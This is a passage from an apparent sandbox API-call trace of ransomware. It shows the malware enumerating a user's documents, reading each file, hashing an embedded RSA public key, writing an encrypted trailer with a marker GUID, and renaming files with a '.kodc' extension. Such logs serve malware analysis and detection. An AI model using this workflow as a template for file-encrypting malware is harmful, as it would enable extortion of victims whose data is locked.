halpmcxz\\documents\\yac0tbne-c1 im.rtf"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Yac0tbNe-C1 iM.rtf.kodc" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\yac0tbne-c1 im.rtf.kodc")) returned 1 [0098.924] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32d0db8 | out: hHeap=0x630000) returned 1 [0098.924] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33171a8 | out: hHeap=0x630000) returned 1 [0098.924] VirtualFree (lpAddress=0x21b0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0098.925] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x65e7c0 | out: hHeap=0x630000) returned 1 [0098.926] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7aaeafb0, ftCreationTime.dwHighDateTime=0x1d5b599, ftLastAccessTime.dwLowDateTime=0xf16076f0, ftLastAccessTime.dwHighDateTime=0x1d5bbea, ftLastWriteTime.dwLowDateTime=0xf16076f0, ftLastWriteTime.dwHighDateTime=0x1d5bbea, nFileSizeHigh=0x0, nFileSizeLow=0x41f5, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ZC9nbsIIkz-871Ly.docx", cAlternateFileName="ZC9NBS~1.DOC")) returned 1 [0098.926] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\ZC9nbsIIkz-871Ly.docx") returned=".docx" [0098.926] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\ZC9nbsIIkz-871Ly.docx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\zc9nbsiikz-871ly.docx"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5cc [0098.926] GetFileSizeEx (in: hFile=0x5cc, lpFileSize=0x9e2fb40 | out: lpFileSize=0x9e2fb40*=16885) returned 1 [0098.926] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x21b0000 [0098.930] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0x41cf, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0098.930] ReadFile (in: hFile=0x5cc, lpBuffer=0x21b0000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x9e2fb78, lpOverlapped=0x0 | out: lpBuffer=0x21b0000*, lpNumberOfBytesRead=0x9e2fb78*=0x26, lpOverlapped=0x0) returned 1 [0098.931] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x33171a8 [0098.931] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33171a8 | out: hHeap=0x630000) returned 1 [0098.931] SetFilePointer (in: hFile=0x5cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0098.931] ReadFile (in: hFile=0x5cc, lpBuffer=0x21b0000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x9e2fb70, lpOverlapped=0x0 | out: lpBuffer=0x21b0000*, lpNumberOfBytesRead=0x9e2fb70*=0x41f5, lpOverlapped=0x0) returned 1 [0098.931] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0098.931] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x1f1) returned 0x32d2a78 [0098.931] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0098.931] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0098.931] CryptAcquireContextW (in: phProv=0x9e2fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x9e2fa50*=0x692d18) returned 1 [0098.932] CryptCreateHash (in: hProv=0x692d18, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x9e2fa58 | out: phHash=0x9e2fa58) returned 1 [0098.932] CryptHashData (hHash=0x3331bc8, pbData=0x32d2a78, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0098.932] CryptGetHashParam (in: hHash=0x3331bc8, dwParam=0x2, pbData=0x0, pdwDataLen=0x9e2fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x9e2fa54) returned 1 [0098.932] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x11) returned 0x32adf00 [0098.932] CryptGetHashParam (in: hHash=0x3331bc8, dwParam=0x2, pbData=0x32adf00, pdwDataLen=0x9e2fa54, dwFlags=0x0 | out: pbData=0x32adf00, pdwDataLen=0x9e2fa54) returned 1 [0098.932] GetLastError () returned 0x0 [0098.933] CryptDestroyHash (hHash=0x3331bc8) returned 1 [0098.933] CryptReleaseContext (hProv=0x692d18, dwFlags=0x0) returned 1 [0098.933] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32d2a78 | out: hHeap=0x630000) returned 1 [0098.933] UuidCreate (in: Uuid=0x9e2fa48 | out: Uuid=0x9e2fa48) returned 0x0 [0098.933] UuidToStringA (in: Uuid=0x9e2fa48, StringUuid=0x9e2fa40 | out: StringUuid=0x9e2fa40) returned 0x0 [0098.933] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x3317170 [0098.933] RpcStringFreeA (in: String=0x9e2fa40 | out: String=0x9e2fa40) returned 0x0 [0098.933] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33171a8 | out: hHeap=0x630000) returned 1 [0098.933] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x33171a8 [0098.933] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4200) returned 0x9ba4d90 [0098.933] SetFilePointer (in: hFile=0x5cc, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0098.933] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3317170 | out: hHeap=0x630000) returned 1 [0098.933] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x1f0) returned 0x32cc1c0 [0098.933] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x3317170 [0098.933] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x1f0) returned 0x32d2a78 [0098.933] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x58) returned 0x3338fa8 [0098.933] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x9b9d888 [0098.933] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331ac40 [0098.933] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x9b9d8d0 [0098.933] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331ac58 [0098.933] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331ac88 [0098.933] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a5b0 [0098.933] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331aca0 [0098.933] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x24) returned 0x334ce70 [0098.934] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x158) returned 0x9b9f078 [0098.934] RtlReAllocateHeap (Heap=0x630000, Flags=0x0, Ptr=0x9b9f078, Size=0x218) returned 0x32d0958 [0098.934] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x558) returned 0x333b018 [0098.934] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331ac88 | out: hHeap=0x630000) returned 1 [0098.934] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331aca0 | out: hHeap=0x630000) returned 1 [0098.934] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a5b0 | out: hHeap=0x630000) returned 1 [0098.934] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x334ce70 | out: hHeap=0x630000) returned 1 [0098.934] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x333b018 | out: hHeap=0x630000) returned 1 [0098.934] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a5b0 [0098.934] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x32cec90 [0098.934] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10) returned 0x331aca0 [0098.934] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x18) returned 0x32adee0 [0098.934] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x9) returned 0x331ac88 [0098.934] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x32cec40 [0098.934] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10e) returned 0x9b8c658 [0098.934] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fc30 [0098.934] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x58) returned 0x3338ee8 [0098.934] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x32adf00 [0098.934] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x104) returned 0x9b8c770 [0098.934] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x32aed00 [0098.934] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32ceca0 [0098.934] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b8c658 | out: hHeap=0x630000) returned 1 [0098.934] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331aca0 | out: hHeap=0x630000) returned 1 [0098.934] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec40 | out: hHeap=0x630000) returned 1 [0098.934] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331ac88 | out: hHeap=0x630000) returned 1 [0098.934] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32adee0 | out: hHeap=0x630000) returned 1 [0098.934] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec90 | out: hHeap=0x630000) returned 1 [0098.934] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a5b0 | out: hHeap=0x630000) returned 1 [0098.934] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fc30 | out: hHeap=0x630000) returned 1 [0098.934] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3338fa8 | out: hHeap=0x630000) returned 1 [0098.934] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32d0958 | out: hHeap=0x630000) returned 1 [0098.935] GetCurrentThreadId () returned 0x42c [0098.935] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x69b948 [0098.935] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x82) returned 0x9b8fc58 [0098.935] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x2c) returned 0x3316db8 [0098.935] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x80) returned 0x692d18 [0098.935] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x148) returned 0x3298d18 [0098.935] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec90 [0098.935] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec40 [0098.935] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x69be70 [0098.935] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0098.935] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0098.935] GetCurrentThreadId () returned 0x42c [0098.935] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0098.935] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0098.935] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xeb) returned 0x32b14c8 [0098.935] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0098.935] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0098.935] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0098.935] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0098.935] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32b14c8 | out: hHeap=0x630000) returned 1 [0098.935] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x69bd68 [0098.935] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec90 | out: hHeap=0x630000) returned 1 [0098.935] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4c) returned 0x3318ea0 [0098.935] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec90 [0098.935] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x69bc60 [0098.935] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec10 [0098.935] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a5b0 [0098.935] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec10 | out: hHeap=0x630000) returned 1 [0098.935] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec10 [0098.936] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec50 [0098.936] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec60 [0098.936] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec80 [0098.936] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec00 [0098.936] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cecb0 [0098.936] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cecc0 [0098.936] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331ac88 [0098.936] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec50 | out: hHeap=0x630000) returned 1 [0098.936] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x32cec50 [0098.936] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec10 | out: hHeap=0x630000) returned 1 [0098.936] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec10 [0098.936] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32ced00 [0098.936] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cece0 [0098.936] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec70 [0098.936] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331aca0 [0098.936] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cece0 | out: hHeap=0x630000) returned 1 [0098.936] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x32adee0 [0098.936] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ced00 | out: hHeap=0x630000) returned 1 [0098.936] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331ac70 [0098.936] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec70 | out: hHeap=0x630000) returned 1 [0098.936] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a538 [0098.936] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec10 | out: hHeap=0x630000) returned 1 [0098.936] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a568 [0098.936] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec60 | out: hHeap=0x630000) returned 1 [0098.936] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a520 [0098.936] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cecb0 | out: hHeap=0x630000) returned 1 [0098.937] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10) returned 0x331acb8 [0098.937] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a520 | out: hHeap=0x630000) returned 1 [0098.937] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10) returned 0x331a520 [0098.937] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a568 | out: hHeap=0x630000) returned 1 [0098.937] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x32cecb0 [0098.937] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec90 | out: hHeap=0x630000) returned 1 [0098.937] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x32ad2c0 [0098.937] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cecb0 | out: hHeap=0x630000) returned 1 [0098.937] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x18) returned 0x32ad520 [0098.937] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0x41f5, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0098.937] WriteFile (in: hFile=0x5cc, lpBuffer=0x69b948*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x9e2fb50, lpOverlapped=0x0 | out: lpBuffer=0x69b948*, lpNumberOfBytesWritten=0x9e2fb50*=0x100, lpOverlapped=0x0) returned 1 [0098.937] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0098.937] WriteFile (in: hFile=0x5cc, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x9e2fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x9e2fb50*=0x26, lpOverlapped=0x0) returned 1 [0098.938] CloseHandle (hObject=0x5cc) returned 1 [0098.938] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x80) returned 0x692d18 [0098.939] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x890) returned 0x32d0db8 [0098.939] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\ZC9nbsIIkz-871Ly.docx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\zc9nbsiikz-871ly.docx"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\ZC9nbsIIkz-871Ly.docx.kodc" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\zc9nbsiikz-871ly.docx.kodc")) returned 1 [0098.940] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x15f4a1d0, ftCreationTime.dwHighDateTime=0x1d5bcf9, ftLastAccessTime.dwLowDateTime=0x35a1de20, ftLastAccessTime.dwHighDateTime=0x1d5c2fe, ftLastWriteTime.dwLowDateTime=0x35a1de20, ftLastWriteTime.dwHighDateTime=0x1d5c2fe, nFileSizeHigh=0x0, nFileSizeLow=0x12464, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_SiYzjXVaSCNyN_APIVN.pptx", cAlternateFileName="_SIYZJ~1.PPT")) returned 1 [0098.940] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x32ce2d8 [0098.940] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x90) returned 0x65e7c0 [0098.940] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\_SiYzjXVaSCNyN_APIVN.pptx") returned=".pptx" [0098.940] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\_SiYzjXVaSCNyN_APIVN.pptx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\_siyzjxvascnyn_apivn.pptx"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5cc [0098.941] GetFileSizeEx (in: hFile=0x5cc, lpFileSize=0x9e2fb40 | out: lpFileSize=0x9e2fb40*=74852) returned 1 [0098.941] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x21b0000 [0098.945] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0x1243e, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0098.945] ReadFile (in: hFile=0x5cc, lpBuffer=0x21b0000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x9e2fb78, lpOverlapped=0x0 | out: lpBuffer=0x21b0000*, lpNumberOfBytesRead=0x9e2fb78*=0x26, lpOverlapped=0x0) returned 1 [0098.945] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x33171a8 [0098.946] ReadFile (in: hFile=0x5cc, lpBuffer=0x21b0000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x9e2fb70, lpOverlapped=0x0 | out: lpBuffer=0x21b0000*, lpNumberOfBytesRead=0x9e2fb70*=0x12464, lpOverlapped=0x0) returned 1 [0098.946] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0098.946] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x1f1) returned 0x32d2a78 [0098.946] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0098.946] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0098.946] CryptAcquireContextW (in: phProv=0x9e2fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x9e2fa50*=0x692d18) returned 1 [0098.947] CryptCreateHash (in: hProv=0x692d18, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x9e2fa58 | out: phHash=0x9e2fa58) returned 1 [0098.947] CryptHashData (hHash=0x3331bc8, pbData=0x32d2a78, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0098.947] CryptGetHashParam (in: hHash=0x3331bc8, dwParam=0x2, pbData=0x0, pdwDataLen=0x9e2fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x9e2fa54) returned 1 [0098.947] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x11) returned 0x32adf00 [0098.947] CryptGetHashParam (in: hHash=0x3331bc8, dwParam=0x2, pbData=0x32adf00, pdwDataLen=0x9e2fa54, dwFlags=0x0 | out: pbData=0x32adf00, pdwDataLen=0x9e2fa54) returned 1 [0098.947] GetLastError () returned 0x0 [0098.947] CryptDestroyHash (hHash=0x3331bc8) returned 1 [0098.948] CryptReleaseContext (hProv=0x692d18, dwFlags=0x0) returned 1 [0098.948] HeapFree (in: hHeap=0x630000, dwFlags=0x0, 